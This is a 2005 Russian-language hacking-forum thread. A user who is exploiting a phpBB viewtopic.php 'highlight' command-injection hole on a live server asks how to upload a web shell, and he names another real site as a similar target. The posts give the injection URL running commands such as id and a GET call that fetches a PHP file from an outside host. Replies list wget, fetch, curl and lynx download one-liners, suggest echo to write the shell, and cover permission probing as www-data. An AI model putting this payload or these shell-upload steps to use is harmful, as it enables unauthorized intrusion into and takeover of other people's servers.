HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PhpBB Shell wget get
  #1  
Старый 03.11.2005, 23:51
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
С нами: 10807637

Репутация: 0
По умолчанию PhpBB Shell wget get

сервак с дырой /viewtopic.php?t=89&highlight=%2527.$poster=%60$cmd %60.%2527&cmd=id
короче я могу выполнять ls -la, cat, pwd... ps auа команду /viewtopic.php?t=89&highlight=%2527.$poster=%60$cmd %60.%2527&cmd=GET http://lol.lol.ru/lol.php > lol.php некак не проходит...
хотя выставил на папки chmod 0777 и все равно не льяется.....
вот подобный форум http://www.leo-clubs.fi/dev/
помогите кто может...
скажите команды я знаю get и wget не та не та не заливает и еще скажите команду создание нового пустого файла
 
Ответить с цитированием

  #2  
Старый 04.11.2005, 05:51
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
С нами: 10807637

Репутация: 0
По умолчанию

народ помогите команды вгет и гет не пашут!!!
 
Ответить с цитированием

  #3  
Старый 04.11.2005, 08:09
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
С нами: 11023586

Репутация: 16


По умолчанию

У меня такая же трабла была - создавася пустой файл вместо шелла. Я не стал особо думать и сдалал echo
Ищи другие качалки.
 
Ответить с цитированием

  #4  
Старый 04.11.2005, 08:14
RevenAnt
Познающий
Регистрация: 08.04.2005
Сообщений: 69
С нами: 11099906

Репутация: 59
По умолчанию

wget, get, fetch, lynx, curl
тести ....
______
ну и канешно echo (как было сказано выше) ... всегда спасает

Последний раз редактировалось RevenAnt; 04.11.2005 в 08:16..
 
Ответить с цитированием

  #5  
Старый 04.11.2005, 14:15
Jenizix
Новичок
Регистрация: 02.11.2005
Сообщений: 26
С нами: 10799689

Репутация: 1
По умолчанию

Wget: wget http://site.com/file.rar -O file.rar
GET: GET http://site.com/file.rar > file.rar
Fetch: fetch http://site.com/file.rar -o file.rar
Curl: curl --output file.rar http://site.com/file.rar
Lynx: lynx -source "http://site.com/file.rar" > file.rar
Links: тоже самое что и у lynx

Вроде так...
 
Ответить с цитированием

  #6  
Старый 04.11.2005, 14:37
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию

ну обычно бывают wget и fetch .. ты сначала uname -a , если фряха то 99% будет fetch а так which fetch lynx wget curl get links =)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #7  
Старый 04.11.2005, 14:51
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
С нами: 10807637

Репутация: 0
По умолчанию

сейчас потестим, а вот еще проблема...
chomod 0777 index.php - результатов не дал
chomod 0777 index.php - результат дал!!!! но ведь я подряд их вводил
на папки тожне не могу chmod выставить

З.Ы. иногда бывает создается пустой файл, использую echo, а он в файл ниче не вставляет

Последний раз редактировалось Shapka; 04.11.2005 в 14:56..
 
Ответить с цитированием

  #8  
Старый 04.11.2005, 14:58
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию

Цитата:
Сообщение от Shapka  
chomod 0777 index.php - результатов не дал
chomod 0777 index.php - результат дал!!!! но ведь я подряд их вводил
такс.. во первых не chomod а chmod] а во вторых ты же одинаковые команды вводил как это бывает что в первый раз не получилось а во второй раз получилось? если не получается chmod значит прав нет..
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #9  
Старый 05.11.2005, 14:48
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
С нами: 10807637

Репутация: 0
По умолчанию

Цитата:
Сообщение от m0nzt3r  
такс.. во первых не chomod а chmod] а во вторых ты же одинаковые команды вводил как это бывает что в первый раз не получилось а во второй раз получилось? если не получается chmod значит прав нет..
Опечатался!

uid=33(www-data)
gid=33(www-data)
groups=33(www-data)
так кто мне поможет э тими правами разобраться
 
Ответить с цитированием

  #10  
Старый 04.11.2005, 15:18
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
С нами: 10807637

Репутация: 0
По умолчанию

в том и фишка! на блин я немного ошибся 1й раз я пробовал на index.php а 2й раз на config.php на конфиг.пхп получилось а на индекс нет, потом пытался cat config.php и мне нечего не выдалось (
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Уязвимости CMS / форумов 11 01.02.2007 12:21
Очередные дыры: phpBB 2.0.14 rsha1988 Уязвимости CMS / форумов 8 08.05.2005 18:48
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Уязвимости CMS / форумов 38 15.02.2005 16:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.